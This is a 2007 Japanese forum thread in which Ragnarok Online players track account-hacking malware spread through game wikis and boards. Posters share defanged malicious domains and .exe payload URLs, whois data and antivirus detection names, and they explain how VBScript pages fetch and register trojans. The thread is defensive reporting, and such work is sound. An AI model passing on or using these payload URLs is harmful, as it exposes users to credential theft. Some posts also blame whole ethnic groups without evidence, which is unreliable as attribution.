71 ：(^ー^*)ノ〜さん sage ： 2007/03/17(土) 22:44 ID:GLhpoqOZ0

某イタリアマフィアの人もそんなようなこといってたなｗ

72 ：(^ー^*)ノ〜さん sage ： 2007/03/17(土) 23:04 ID:YRDFUXNz0

>>68-71
雑談や質問等は雑談スレでしましょ。
情報を求めてやってくる人が把握しやすいようにする為にもさ。

73 ：(^ー^*)ノ〜さん sage ： 2007/03/18(日) 00:51 ID:W+4ySq/60

>>70
既に書いていたら、「小説を書いています」と言わないとおかしいだろ。
それに行動を起こすことをまず思うからこそ行動に起こすんだろ？

74 ：(^ー^*)ノ〜さん sage ： 2007/03/18(日) 01:29 ID:kfNuJCuL0

>73
まず行動しろ

75 ：(^ー^*)ノ〜さん sage ： 2007/03/18(日) 01:49 ID:JDgehqw60

わざとやってるの？雑談はこっちでやってよ
http://enif.mmobbs.com/test/read.cgi/livero/1173878067/

76 ：(^ー^*)ノ〜さん sage ： 2007/03/18(日) 02:39 ID:9vmZiN1o0

はいはい、本日目撃の垢ハックアドレス。既出だったらごめんね。

ラグナロク自動の攻撃回復HP.PKスピードを加速する
--------------------------------------------------------------------------------
ラグナロク自動の攻撃回復HP.PKスピードを加速する
2007.3更に新版は
以前ラグナロクプレーヤーの当製品に対する支持に感謝するため.
2006.12会社は研究?開発してラグナロク自動のプログラムを更新して、
無料で使う；
リネージュ自動の攻撃回復HP.PKスピードを加速する
登録と申し込みは.より詳しい情報は//www■din-or■com/bbs

77 ：(^ー^*)ノ〜さん sage ： 2007/03/18(日) 05:22 ID:/9u8eReN0

>>68
所謂「不正アクセス防止法」の公訴時効は3年。
ttp://ja.wikipedia.org/wiki/%E5%85%AC%E8%A8%B4%E6%99%82%E5%8A%B9
ttp://www.ipa.go.jp/security/ciadr/law199908.html
せめて被害相談だけでも出しておいた方がいいぞ。

78 ：(^ー^*)ノ〜さん sage ： 2007/03/18(日) 17:06 ID:OC9hsB2C0

ちょいと質問させてください。

普段、スレを見るときはJane Viewを使っています。
たとえばレス中にアドレスが書いてあった時にカーソルを合わせると
接続先の情報がポップアップ(?)みたいな形で表示されると思うんだけど
カーソルを合わせたアドレスがアカハクアドだった場合はアウトかな？

79 ：(^ー^*)ノ〜さん sage ： 2007/03/18(日) 18:25 ID:kMaGcawd0

>>78
>>1
>一般的なセキュリティ 対策・相談・雑談は>>2に有る雑談スレを利用して下さい。

>セキュリティ対策、質問・雑談スレ
> ttp://enif.mmobbs.com/test/read.cgi/livero/1173878067

80 ：(^ー^*)ノ〜さん sage ： 2007/03/18(日) 20:07 ID:OC9hsB2C0

>79
失礼しました。
該当スレにて再度質問してみることにします。

81 ：(^ー^*)ノ〜さん sage ： 2007/03/18(日) 22:32 ID:3FVFMCr10

アドレス的には既出だけど使用報告は初めてな気がするので貼り。
アプリコットカフェ(アコプリスレの外部板)の質問スレより

>688 名前：みなシャン MAIL: 投稿日：2007/03/18(日) 18:16:02 [ Z1.wJwWo ]
>
>新規頭装備リスト
>
>リヒタルゼン追加頭装備アイテム情報　[2006/11/15]　韓国サクライ実装)
>■新規頭装備リスト
>■新規武器リスト
>■新規防具リスト
>
>韓国サーバーの情報ですがこのまま実装されるというものではありませ・B
>画像は一部国際サーバーのものを使用してます。
>随時更新しておりますのでリロードしてください。関連サイトを参照して下さい
>www■cityhokkai■com/links/

最近アプリコへの爆撃が増えた気がする……

82 ：(^ー^*)ノ〜さん sage ： 2007/03/19(月) 03:01 ID:Gv5p/75R0

別ゲームですが、Master of Epicのアップローダにもハック偽装jpgが張られたようです。
張った時のコメントも「Dツアー」と、MoEユーザーならわかるような言葉で張られていました。
中身は　www■zhangweijp　飛ばしのものでした。
MoEも狙われてきているようですので、プレイしている方は注意。

この先ネットゲームは延々こういったものを恐れながらプレイしていくことになるんですかね・・・

83 ：& ◆rBHtNzxqKY sage ： 2007/03/19(月) 11:36 ID:Y5FMsPMT0

いつもの調査中に見つけたもの

| それぞれ遊ぶ大全書 疑問の伝言のコンサルティングがあります!
| http://www.RAGNAROX■mobi/bbs

Registrant ID:hc883359917-cn
Registrant Name:lin bao
Registrant Organization:lin bao
Registrant State/Province:Fujian
Registrant Country:CN

Name: baobao123.w23.cndns■com
Address: 60.190.228.76
Aliases: www.ragnarox■mobi

脆弱性が放置されている環境でダウンロードさせられる svch.exeは、
Power Adapterサービスを作成するタイプのもの。
Trojan-PSW.Win32.Maran.cz との判定。

>>82
やるべきことさえきちんとやっていれば「恐れる」必要は
ないんじゃないでしょうか。

84 ：(^ー^*)ノ〜さん sage ： 2007/03/19(月) 13:35 ID:k7470Fvr0

>>83
またも福建（Fujian）人ですね。

baobao123■w23■cndns■com/bbs/
からもwww■ragnarox■mobi/bbs/の実行ファイルを呼んでいるようだ。

これを書いている時点では後者はソースチェッカーで危険と出たが、前者はまだ出てないな。

ちょっとそれるが
垢ハククラックは中国国内のサイトもやられてるみたいだ。
------------------
中国の大手サイトでマルウェア感染、スーパーボウルと同じ攻撃者？
3月19日13時2分配信 ITmediaエンタープライズ

　中国の大手サイトにトロイの木馬やパスワード窃盗コードが仕掛けられているのが見つかったとして、セキュリティ企業のWebsenseがアラートを公開した。
　Websenseによれば、Microsoftのパッチを当てていないユーザーが問題のサイトを訪れると、エンドユーザーが何も操作しなくても脆弱性を悪用してエクスプロイトコードが実行される。外部のサイトからロードされるファイルでキー入力をキャプチャし、ユーザー情報を盗み出す仕掛けになっているという。
　コードが仕掛けられたサイトの中には中国で人気の書籍販売サイトなどもあり、いずれもハッキングされて細工を施したIFRAMEタグが挿入されたと見られる。
　中国サイトの悪質コードについてはSymantecもブログで報告、その1例として「Lingling」を挙げている。

　攻撃者はハッキングしたWebサイトにSQLインジェクションを使ってIFRAMEタグを挿入し、WebブラウザでJavaScriptをロードさせる。このJavaScriptにはInternet Explorer（IE）のさまざまなエクスプロイトコードが含まれ、ここからLinglingがダウンロード・実行される。
　Linglingは、インストールされるとユーザーがゲーム「World of Warcraft」をプレイするのを待ってメモリをスキャンし、ユーザー情報を探し出して攻撃者に送信する。攻撃者はこの情報でアカウントにログインし、仮想アイテムを盗んで売り払い、現金に換えようとする。
　米国では今年、スーパーボウル会場のドルフィンスタジアム公式サイトにIFRAMEタグが仕掛けられる事件が起きたが、Linglingにはこれと同じ攻撃者が関与しているとSymantecは見る。
　中国ではLineageやWorld of Warcraftなどのオンラインゲームに興じるユーザーが多いため、必然的にこうしたゲームのユーザー情報を盗み出すコードが増えるとSymantecは解説している。
------------------

人が多いサイトや人気サイトを狙う、IFRAME、オンラインゲーム狙いのトロイの共通項。
福建人の仕業にまず間違いないな。

85 ：(^ー^*)ノ〜さん ： 2007/03/19(月) 17:31 ID:/K8gVsHO0

いっそ各職業Ｗｉｋｉのタイトルに天安門や民主主義って名前入れておけば
防衛になるのだろうか・・・

86 ：(^ー^*)ノ〜さん sage ： 2007/03/19(月) 19:44 ID:k7470Fvr0

リネージュ資料室に以下のドメインが記載
www■ahwlqy■com

これは/に直接罠を置いている典型的なトラップドメイン。
123と言う名の実行ファイルが置いてあった。
ただしモノが古いのかClamWinでも検知可能。
QQと言う部分から本来はメッセ狙い？
QQメッセと言うのがあちらでは流行っているとか。

カスペルスキー
infected by Trojan-PSW.Win32.QQPass.qa

F-Secure
Trojan-PSW.Win32.QQPass.qa

ClamWin
Trojan.Spy-2429 FOUND

87 ：(^ー^*)ノ〜さん ： 2007/03/20(火) 07:58 ID:RtLcOLkoO

今RMC見たら何やらカスペがトロイを検知
即隔離されたんで消して今再度ウィルススキャン中

昨日見たときは反応しなかったのに・・・

88 ：(^ー^*)ノ〜さん sage ： 2007/03/20(火) 08:11 ID:nce5HtXN0

RMCの何処の何を見て、何のウイルスがかかったか書かないと不安煽るだけなんだけど

89 ：(^ー^*)ノ〜さん sage ： 2007/03/20(火) 08:16 ID:RtLcOLkoO

すまん、いきなりでかなり焦ったからウィルス名をメモるの忘れてた・・・

検知したのはRMCを開いた瞬間だったからトップページだと思う

90 ：(^ー^*)ノ〜さん sage ： 2007/03/20(火) 08:25 ID:nce5HtXN0

Firefox+NOD32(2127)でTOP開いてみたけど反応なかった

91 ：(^ー^*)ノ〜さん sage ： 2007/03/20(火) 08:43 ID:RtLcOLkoO

何度も申し訳ない
カスペの処理内容に名前が残ってた

スクリプト:ttp//www5.big.or.jp/〜haya/rmc/[2]に新しい種類のトロイ
Trojan-Spy■HTML■Amazonfraud■pを検知しました

■部分は.です。
アマゾンってのが良くわかんないが
これはハック関係とは無縁・・・？

92 ：(^ー^*)ノ〜さん sage ： 2007/03/20(火) 08:50 ID:6vMO7Mbv0

ttp://d■hatena■ne■jp/Maybe-na/20070316/1174047076
に飛んでも何も表示されない
これはハック関係とは無縁・・・？

93 ：(^ー^*)ノ〜さん sage ： 2007/03/20(火) 08:54 ID:hMt7qcaF0

>92
>1
>重要な情報が埋れてしまわないようにする為、一般的なセキュリティ
>対策・相談・雑談は>>2に有る雑談スレを利用して下さい。

94 ：(^ー^*)ノ〜さん sage ： 2007/03/20(火) 09:07 ID:nce5HtXN0

>>91
ウイルスには違いないようだけどググっても情報不足のよう…
カスペのウイルスリストにもないから何とも言えない

>>92
確実に垢ハックの書き込みとかURLならこっちで報告が良いと思うけど
これってそうなの？的なのはLiveROの方が適しているからそちらで
URLググってみると普通のはてなサイトみたいだけどね

95 ：(^ー^*)ノ〜さん sage ： 2007/03/20(火) 09:19 ID:JJh8dEKe0

>>87
RMCを開いたのはブックマーク経由でしたか、どこかからのリンクでしたか。
9時現在 IE7 + SAV, Firefox + AVS の複数の環境で確認するも無反応です。
ざっと眺めたソースにもそれっぽいもの見当たらず。

現象が確認できないので、まだなんともいえません。


なお、これを■置換するのは全然意味がありません。
| Trojan-Spy■HTML■Amazonfraud■pを検知しました

96 ：(^ー^*)ノ〜さん sage ： 2007/03/20(火) 09:36 ID:RtLcOLkoO

IE開く→お気に入りからRMC→カスペ反応→即削除って流れです。
こちらも再度スキャンしてみましたが他には特に変化なし・・・

置換についてはやった方が良いのかわからなかったので
とりあえずやっておきました。


メンテ前にやろうと思ってたけど少し様子見してみます・・・

97 ：(^ー^*)ノ〜さん sage ： 2007/03/20(火) 10:09 ID:1GbUqaV80

こちとらRMCを最後に閲覧したのが昨日の20時くらい
今カスペ通したけど特に反応なし

アマゾンの広告関係なのかな？
検索したけどめぼしい情報は得られず…

98 ：(^ー^*)ノ〜さん sage ： 2007/03/20(火) 13:04 ID:E3QsfaJw0

>87-97
>1
>重要な情報が埋れてしまわないようにする為、一般的なセキュリティ
>対策・相談・雑談は>>2に有る雑談スレを利用して下さい。

セキュリティ対策、質問・雑談スレ
　http://enif.mmobbs.com/test/read.cgi/livero/1173878067
此方に移動して下さい。此方はどちらかというと『(事前の)対策スレ』であり
(事後の)『対応スレ』ではありません。

99 ：(^ー^*)ノ〜さん sage ： 2007/03/20(火) 13:22 ID:MqfL/Zpv0

突然すみません。さっき騎士wikiにあった垢ハック踏んだっぽいです。
とりあえずの対処として、OS再インスト（パーティションのフォーマットしなおし）
しておけば何とかなりますか？

100 ：(^ー^*)ノ〜さん sage ： 2007/03/20(火) 13:23 ID:5KfMRhuO0

おｋ

101 ：(^ー^*)ノ〜さん sage ： 2007/03/20(火) 13:24 ID:MqfL/Zpv0

すれ違いでした。

102 ：(^ー^*)ノ〜さん sage ： 2007/03/20(火) 13:24 ID:MqfL/Zpv0

スレ違いなのに返信ありがとうございました。

103 ：前スレ652 sage ： 2007/03/20(火) 13:42 ID:Y0U5EV5IO

あれから一応進展があったんだけど、書き込むのは
セキュ雑談スレの方がいいかね？

104 ：(^ー^*)ノ〜さん sage ： 2007/03/20(火) 13:59 ID:bcOjnkLS0

そうさね。んで、重要な事はこっちにあとからコピペってもいいし。

105 ：(^ー^*)ノ〜さん sage ： 2007/03/20(火) 16:13 ID:A9USNbor0

鯖板に立てられていた垢ハックスレ。

1 Saraの中の名無しさん 07/03/20 16:04:22 ID:Vv7V0MKq
キャラスロ増加決定記念スレ立て

みんなでOD臨とかGD臨とか　や　ら　な　い　か

前スレwww■din-or■com/bbs

106 ：(^ー^*)ノ〜さん sage ： 2007/03/20(火) 18:14 ID:1GbUqaV80

>>98
新種のウイルスの可能性がある上に
検出した場所が場所なんだからここでいい気がするんだが
向こうのスレでも言われていたが
だったら初めからテンプレ以外書き込み禁止とかにすれば？と思った

107 ： ◆sp4Sh9QXGI sky.geocities.jp/vs_ro_hack/ ： 2007/03/20(火) 19:18 ID:PRs0mB+v0

どうも、中の人です。
朝に更新しましたが書き込めていなかったようなので再度。

ragnarox■mobi、ahwlqy■com共に未出IPです。
PG2リストは通常版、積極版両方を更新していますのでご確認ください。

Name: ahwlqy■com
Address: 61.188.38.46

Name: ragnarox■mobi
Address: 202.75.223.131

#スレが分かれてから未出報告分の抽出がしやすくなり、助かっております。
#あまり厳密にすると自治厨UZEEEEEとか言うのも出てきそうですが。
#まぁそういうのはほっときましょう、ハイ。

108 ：(^ー^*)ノ〜さん sage ： 2007/03/20(火) 20:24 ID:oVnOO7Mv0

アコプリwikiに「新頭装備」の項目が追加され以下の項目が追加されてました。
>>76 >>105や前スレ>>742のアドレスと同様ですね。ここやたら活動してるみたい。
ぷにるで全オフでログとってみたらフレームやスクリプトで連鎖してて
最終的に www■interzq■com/bbs/t1■exeを開く仕掛けやね。
-------------------------------
ニブルヘイム実装と一緒に新しい頭装備ができました。みんなで新しい頭装備をつけてツアーに行きま

した。クマとカウボーイハットは借り物です。寒い格好してるダンサーに暑苦しいクマ帽。頭蒸れてま

す。
www■din-or■com/bbs
-------------------------------

109 ：(^ー^*)ノ〜さん sage ： 2007/03/20(火) 21:26 ID:s6QJYaIS0

アップデートも滞り、更新するような内容もあまりないだろうし
wikiはしばらく編集不可、閲覧のみ可能にしてみたらどうだろうか

これだけ荒らされるとね・・・wikiも怖くて見れませんよorz

110 ：(^ー^*)ノ〜さん sage ： 2007/03/20(火) 21:39 ID:tLEX/0ke0

管理状況に難があると思うところがあれば、
そのwikiを持っている各スレで、一度提言してみてはどうだろうか。
中の人もたぶん見ていると思うし。




某wikiで実際にそうしてるんだけど、その「しばらく」の解除時期が見えなくて困る。

111 ：(^ー^*)ノ〜さん sage ： 2007/03/20(火) 22:00 ID:oVnOO7Mv0

進言はしてみたけどどうだろうね。
どちらにせよワンクッションないWikiはかなり危ない。

112 ：(^ー^*)ノ〜さん sage ： 2007/03/20(火) 22:42 ID:AIRyWvhg0

雑談池ハゲ

113 ：(^ー^*)ノ〜さん sage ： 2007/03/20(火) 23:52 ID:JJh8dEKe0

機械翻訳系の怪しい日本語文を伴うアカハックURL書き込みが
昨日今日は特に活発なので動向に注意してください。
最近の傾向として、新ドメインの取得ペースは減少。
数ヶ月前に良く見かけたドメインの再利用が目立ちます。


>>109
凍結するなり読み取り専用にしてしまえば、(アカハック)spamとか
こないだろうことは百も承知なんですが、いろいろな努力をしつつ
あえて「Wikiであること」を維持している管理者がほとんどでしょう。

それでは困るっていうなら、有志でWikiの静的ミラーサイトでも
立ち上げるのも一つの手ではあります。
Wikiのコンテンツについては「誰かのもの」じゃありませんし。
# ただし、そこまで現Wiki管理者にやれというのは筋違いと思います。

>>110
それいったら、ROつぶれるまで解除は無理なんじゃないかと。

--
繰り返しますが、踏まないことより踏んでも痛くないように
しておくのが正しいのです。

# でも、踏んづけちゃったとき、どんな対策がしてあったとしても
# 当人が大丈夫という確信を持てない以上、他人にできる助言は
# 「再インストールが確実」と言うことだけな現実。


>>112
誘導はともかくとして、
書き込みを躊躇するような雰囲気作りは、むしろ有害に思えますが。

114 ：(^ー^*)ノ〜さん ： 2007/03/21(水) 08:46 ID:BikmjAmN0

職業別wikiと未実装wiki、blog、RO日記など
最近やたらと垢ハクURLが張られてるからノートンやウイルスバスター使ってる奴は注意しろよ
迂闊に飛ぶと垢ハクされて終わるぞ

115 ：(^ー^*)ノ〜さん sage ： 2007/03/21(水) 09:17 ID:vXvVA3bc0

>>114
ノートンは結構反応がすばやい感じがする。
実際アカウントハックウイルスのアドと知りつつソースを見ようと
HTMLをＤＬしたら消されてた。

あと垢ハクが張られるWikiとそうでないWikiに分かれてる気がする。

116 ：(^ー^*)ノ〜さん sage ： 2007/03/21(水) 09:22 ID:P1n9nGzJ0

意味無しコメントアウトしてる奴って何なんだろう

117 ：(^ー^*)ノ〜さん ： 2007/03/21(水) 10:19 ID:nyEddoq30

>>115
マジレスするとノートンは対応が遅いから駄目

118 ：(^ー^*)ノ〜さん sage ： 2007/03/21(水) 11:05 ID:AiCyPouy0

これを発見。
shoopivdoor■w19■cdnhost■cn/fczdun/

www■shoopivdoor■com/fczdun/wu.htm　単なる画像
www■shoopivdoor■com/fczdun/wu.htm　罠本体


cdnhost■cnは四川省成都のネットサービス？
IPも四川省と出ている。

後者が本体だが、登録情報に変化が現れた。
郵便番号が四川省成都市（610000）になっていることに注意。

ドメインIP、住所が福建省なのにね。


Domain Name ..................... shoopivdoor■com
Name Server ..................... ns1.dnsfamily.com
ns2.dnsfamily.com
Registrant ID ................... hc210030550-cn
Registrant Name ................. zhiqiqnag lin
Registrant Organization ......... zhiqiang lin
Registrant Address .............. fujian
Registrant City ................. longyan
Registrant Province/State ....... fujian longyan　（福建省竜岩）
Registrant Postal Code .......... 610000　（四川省成都）
Registrant Country Code ......... CN

119 ：(^ー^*)ノ〜さん sage ： 2007/03/21(水) 11:13 ID:AiCyPouy0

単なる画像のほうは　wu　ではなくて　wz　ね。
サイズ0で呼び出しているimg.gifと言うのが何者なのかわからないけども。

120 ：(^ー^*)ノ〜さん sage ： 2007/03/21(水) 12:47 ID:AiCyPouy0

TEACUP掲示板はプロキシ使われまたあちこち爆撃されている模様。

ここ最近の書き込みを調べるとこのリモホが目立つ、禁止ホストにしておいたほうがいい。
cache.telstra.net

121 ：(^ー^*)ノ〜さん sage ： 2007/03/21(水) 13:03 ID:VrQ0sBK/0

アコ、プリ持ちは垢ハクサイトのURL踏まないように中止･･･

122 ：(^ー^*)ノ〜さん sage ： 2007/03/21(水) 13:13 ID:8XRE24nA0

中華やりたい放題だなｗ

123 ：(^ー^*)ノ〜さん sage ： 2007/03/21(水) 13:34 ID:NZa2cjDk0

>118
そのwu.htmにはVBScriptが仕込まれてる。
gifファイルは拾えなかったが、ダミーの可能性あり。

VBScriptはアスキーコードで書かれていて、デコードすると
これまたVBSなコードになり、それをExecuteしてる形。

デコードしたコードをテキストに保存したところ、カスペで
Trojan-Downloader.VBS.Psyme.ds と検知。

www■shoopivdoor■com/fczdun/ro.exe
www■lovetw■webnow■biz/sigui/t2.exe
の２ファイルを読み込んでレジストリ登録する模様。

124 ：(^ー^*)ノ〜さん sage ： 2007/03/21(水) 13:44 ID:NZa2cjDk0

>121
詳しく。
またアコプリのテンプレが改変されたとか？

アコプリスレでは避難所Wikiを立ち上げる話が出てたが、早急に
行動に出た方がいいかもしれないね……

125 ：(^ー^*)ノ〜さん sage ： 2007/03/21(水) 13:47 ID:VeO0FkZd0

>>124
>アコプリスレでは避難所Wikiを立ち上げる話が出てたが、早急に
>行動に出た方がいいかもしれないね……

>>124

126 ：にゅぼーん にゅぼーん ： にゅぼーん

にゅぼーん

127 ：(^ー^*)ノ〜さん sage ： 2007/03/21(水) 15:43 ID:aUgQU45b0

>>126
死ね
http://enif.mmobbs.com/test/read.cgi/livero/1173878067/

128 ：(^ー^*)ノ〜さん sage ： 2007/03/21(水) 15:53 ID:oszVrl4S0

http://www■game-fc2blog■com/chaos
が鯖スレに仕込まれてた。
踏んじゃったので仕方なくソースを見るとフレームソースとして
>>118の様に2つのhtmlが指定されていた。

vbs駆動のようなのでFirefoxで見た場合はセーフ？
踏んだ跡に思ったのですがFirefoxのキャッシュフォルダってどこにあるんでしょうか？

129 ：(^ー^*)ノ〜さん sage ： 2007/03/21(水) 17:05 ID:yeCKdJy50

>>126
削除依頼は出てるみたいだけど、このURLは間違っても開いてはいけません。

130 ：(^ー^*)ノ〜さん sage ： 2007/03/21(水) 17:23 ID:zN/b/eTi0

踏んじゃったんだけどどうすればいいの；；
なんか真っ白なページが表示されただけだから大丈夫なの？？
｡・ﾟ・(ﾉД`)ｳﾜｰﾝ

131 ：(^ー^*)ノ〜さん sage ： 2007/03/21(水) 17:29 ID:AxVRvmBF0

>>126

>>1
>>4
>>10


>>128
C:\Documents and Settings\ユーザー名\Local Settings\Application Data\Mozilla\Firefox\Profiles\(英数字の羅列).(プロファイル名)\

132 ：(^ー^*)ノ〜さん sage ： 2007/03/21(水) 17:34 ID:qxnL8I300

>>130
126の事なら踏んだ時点でアウト。とにかくここにも張られるURLでも迂闊に踏まない事が重要。

HDDフォーマットしてOSインストが無難。
絶対にそのPCでROにログインしようとしたりアトラクションセンターにログインしないように！

とりあえず詳しく聞きたいなら>>2のLiveROのセキュリティ対策、質問・雑談スレの方で聞いてみなされ。

133 ：(^ー^*)ノ〜さん sage ： 2007/03/21(水) 18:03 ID:yeCKdJy50

>>126がにゅぼーんされたので■で伏せて掲載。
なお、これは絶対に開いてはダメです。

ttp://www■wikiwiKi-game■com/8651262/

134 ：(^ー^*)ノ〜さん sage ： 2007/03/21(水) 19:09 ID:Ur5nmQ3F0

133のURL見てみた。ソース見たらVBScriptで
http://www■slower-qth■com/8651262/ファイル名■exe
の実行やレジストリ登録しようとしてる感じ。（ファイル名の部分はランダム英文字列）
スクリプト無効にしてなければ踏んだだけでアウトだろうね。

>>130
詳しいことを知りたければ132の誘導に従って貰うとして、でも一つだけ。
真っ白なページだから、という判断は無意味。
重要なのはそこに罠が仕込まれているかどうかだけであり、画像や文字表示の有無は大抵無関係。

135 ：(^ー^*)ノ〜さん sage ： 2007/03/21(水) 19:12 ID:j90qqe2Z0

MMOBBSに貼られたのって、もしかして初めて？

136 ：(^ー^*)ノ〜さん sage ： 2007/03/21(水) 19:54 ID:v2eob4ds0

直接対策スレに来るとは想定外だったな

137 ：(^ー^*)ノ〜さん sage ： 2007/03/21(水) 20:06 ID:9QtE1gUL0

くそ中華め・・・
いい加減にしろまじ
もうゆるさん

138 ：(^ー^*)ノ〜さん sage ： 2007/03/21(水) 20:20 ID:v2eob4ds0

中華にしてはうまく日本語で書き込んでるよな
日本人の仲介者とか居るんだろうか

139 ：(^ー^*)ノ〜さん sage ： 2007/03/21(水) 20:23 ID:RcProxip0

雑談はこちらで
http://enif.mmobbs.com/test/read.cgi/livero/1173878067/

140 ：(^ー^*)ノ〜さん sage ： 2007/03/21(水) 20:43 ID:w8AyVqAR0

アコ、プリスレが特に酷い
新装備とカードが追加されたと偽って垢ハクURLが張られまくっててね

141 ：(^ー^*)ノ〜さん sage ： 2007/03/22(木) 00:01 ID:mQ5Z1zVK0

専ブラでうっかりgifファイル踏んだらデコードエラーとか出たんだがまさか垢ハックじゃないよな。
gifに偽装とか、ある話だっけ？

142 ：(^ー^*)ノ〜さん sage ： 2007/03/22(木) 00:03 ID:Me/ZP5uT0

何処で踏んだかまで書かないとわからないわけで
そういったあやふやな事項は向こうのスレの方が適してるわけで
画像URLを貼り付ける際には「.」を「■」にすることを忘れないように

143 ：(^ー^*)ノ〜さん sage ： 2007/03/22(木) 00:03 ID:72lg3B5W0

>>141
移動よろしく。

>>2
>【一般的話題用】
>セキュリティ対策、質問・雑談スレ
>　http://enif.mmobbs.com/test/read.cgi/livero/1173878067

144 ：(^ー^*)ノ〜さん sage ： 2007/03/22(木) 00:28 ID:h3QArhXd0

感染の心当たりはないんですけどキャラセレクト後のパスワード入力の時
ちょっと重くなったりログイン直後３０秒くらいＨＤがガリガリいって
微妙に重くなってます。これは感染を疑ったほうがいいでしょうか？

145 ：(^ー^*)ノ〜さん sage ： 2007/03/22(木) 00:32 ID:Me/ZP5uT0

>>144
>>143
誘導ついでに、それだけじゃアドバイスできない
起動時にnPro読み込みで重い場合も多々あると思う

146 ：(^ー^*)ノ〜さん sage ： 2007/03/22(木) 01:51 ID:AEXU6wWD0

感染してんでしょうか？とかあいまいな質問は >>143
テンプレちゃんと埋めたり垢ハックの分析や情報収集みたいな明確な垢ハックの話題はこっち。

147 ：(^ー^*)ノ〜さん ： 2007/03/22(木) 16:44 ID:sCNmfW9z0

【 　 　ツールの使用の有無　 　 　 】 (No)
【　 ネットカフェの利用の有無　 　　】 (No)
【　 　　 OS　 　 】 (WinXP　HomeEdition）
【使用ブラウザ 】 (IEVer分からず・・・)
【　アンチウイルスソフト 】 (当時は全セキュリティOFF状態)
【 ウイルススキャン結果】 (カスペルスキーオンラインスキャンでは検知無し)
【スレログやテンプレを読んだか】 (読み飛ばし含めてこのすれを一通り)
【説明】
昨日の夕方、上で報告のあった
http://www■game-fc2blog■com/chaos
を踏んじゃって、あわてて別窓のROをダウン。
ルーター接続の別PCにて全アカウントのキャラパスを変更。
踏んだPCはその間にカスペルスキーでチェック。
チェック結果からは何も出なかったけど、怖いので踏んだPCだけOS再インストール。
HDDは完全フォーマット済み。

今日仕事から帰ったらログインパスを変更して、ルータ接続の２台をカスペルでチェックする予定。
その他これやっといたほうがいいってのあればお願いします。
不安なのは踏んだPCがルータの接続のメインPCなこと・・・。

148 ：(^ー^*)ノ〜さん sage ： 2007/03/22(木) 17:09 ID:ypQGPO8uO

>>138
知り合いに垢ハックされて腹いせにあちこちに貼ったとかいってる奴いたし
もはやどこに敵がいるかわからないぜゾンビ映画状態

149 ：(^ー^*)ノ〜さん sage ： 2007/03/22(木) 18:26 ID:NKW7MVRk0

>>148
犯罪幇助で逮捕されっぞ。
ウィルスサイト貼ってるのと同じだしな。

150 ：(^ー^*)ノ〜さん sage ： 2007/03/22(木) 18:36 ID:AEXU6wWD0

>>147
フォーマットまでやったならもう言うことないかと。
お手本みたいな対処だ。
あとはセキュリティソフトちゃんとつけとくくらいかな。

151 ：(^ー^*)ノ〜さん sage ： 2007/03/22(木) 19:12 ID:AEXU6wWD0

セキュ対策スレ253から

http://www■fcty-net■com/
から
http://www■fcty-net■com/img/fcty■jpg
http://www■lovetw■webnow■biz/liang/lin■htm
を開こうとしている。
後者のHTMLの方からVBSやJavaスクリプトで以下のexeを開きExecuteしようとしてる模様。
さすがにファイル落としてはいない。
httP://www■lovetw■webnow■biz/liang/ro■exe
httP://www■lovetw■webnow■biz/liang/xia■exe

152 ：(^ー^*)ノ〜さん sage ： 2007/03/22(木) 19:26 ID:z3pqbk4V0

スレ違いかも知れないけど、kaspersky Lab様に垢ハックウイルスの検体を提供しました

Hello.

New malicious software was found in the attached file.
Trojan-PSW.Win32.Maran.de
It's detection will be included in the next update. Thank you for your help.
-----------------
次回の更新で対応するそうです

一応報告です、スレ汚しすいません

153 ：(^ー^*)ノ〜さん sage ： 2007/03/22(木) 20:17 ID:ItHx82PB0

>151
Domain Name ..................... fcty-net■com
IP Address: 222.77.185.101

いつもの福建人。

154 ：(^ー^*)ノ〜さん sage ： 2007/03/22(木) 22:45 ID:xhAI0mnR0

垢ハックをくらい、装備アイテムをもってかれた人に質問します。
アイテムや装備って見境なく全部とられますか？

正直レアな装備なんか、とられても、またガンバルと思えるけど
他人からもらえた思い出のアイテムや装備も価値の有り無し見境無くとられる感じですかね？

バレンタインのチョコなんて中華に取られたりしちゃう？

155 ：(^ー^*)ノ〜さん sage ： 2007/03/22(木) 23:05 ID:BEpZcQ5H0

>>154
多分liveRoの方のスレ向きかなぁ。

156 ：408 sage ： 2007/03/23(金) 00:45 ID:8mhwb4+E0

Kaspersky Internet Security使いの人向けの
国別接続拒否フィルタルール作ってみたんだけど需要あるかな？
(要するに国丸ごとパケットフィルタで落とす乱暴技)
とりあえずCN, KR, TWつくってみたけど。
需要あるなら公開したいんだけど…このご時世にuploaderってのもちょっと危険かな？

あと、他の国っていままであったかな？(データが無くてUS扱いになるやつ以外に)

157 ：(^ー^*)ノ〜さん sage ： 2007/03/23(金) 00:46 ID:8mhwb4+E0

ぐは＿|￣|○　名前残ってた

158 ：(^ー^*)ノ〜さん sage ： 2007/03/23(金) 01:11 ID:BMm41T+00

zipでｸﾚ

159 ：(^ー^*)ノ〜さん sage ： 2007/03/23(金) 01:12 ID:EyC4Tpgn0

>>156
興味あるので是非よろしく

160 ：156 sage ： 2007/03/23(金) 01:24 ID:8mhwb4+E0

とりあえずMMOBBSアップローダーに投函　*'-')シ　三○
ttp://www.mmobbs.com/uploader/files/2326.zip

161 ：(^ー^*)ノ〜さん sage ： 2007/03/23(金) 01:42 ID:BMm41T+00

|∀｀)いただいた

ｶｽﾍﾟﾙｽｷｰ導入してるものの、あんまいじくって無いので
いい機会なので設定をいろいろ見てみるかな〜

162 ：(^ー^*)ノ〜さん sage ： 2007/03/23(金) 12:36 ID:35NAzEtF0

>>150
ありがとうございます

163 ：sage ： 2007/03/23(金) 16:35 ID:7vWoFTRn0

先日、垢ハックされました。
ログイン中に別の場所でのログインがされました。と表示されて
強制ログアウト。
その後パスワードを急いで変更しましたが７〜８分後にログイン出来たときには
裸で違うまMAPにいました。
メインキャラはキャラパスも変更されてる状態です。


当日に閲覧したサイトは、モンク、ソウルリンカー、ローグWIKI、RMCだけです。

アイテムは全部根こそぎやられました。
ウィルススキャンでは、ウィルスが検出されなかったので、
カスペルスキーの試用版で検索したところ、
Trojan-PSW.W32というウィルスが検出されました。

今思うと、いつもよりもラグがすごくログイン中も挙動が
おかしかったような気がします。
現在、ガンホーからの返事待ちの状態です。

初めて書き込みをするので読みにくかったらすいません。

164 ：sage ： 2007/03/23(金) 16:40 ID:7vWoFTRn0

申し訳ないです。テンプレみてなかったです。
● 実際にアカウントハックを受けた時の報告用

【　 　 　 気付いた日時　 　 　 　 　 】 (3月21日)
【不審なアドレスのクリックの有無　】 (モンク、ローグ、ソウルリンカーWiki又はRMC)
【他人にID/Passを教えた事の有無】 (No)
【他人が貴方のPCを使う可能性の有無】 (No)
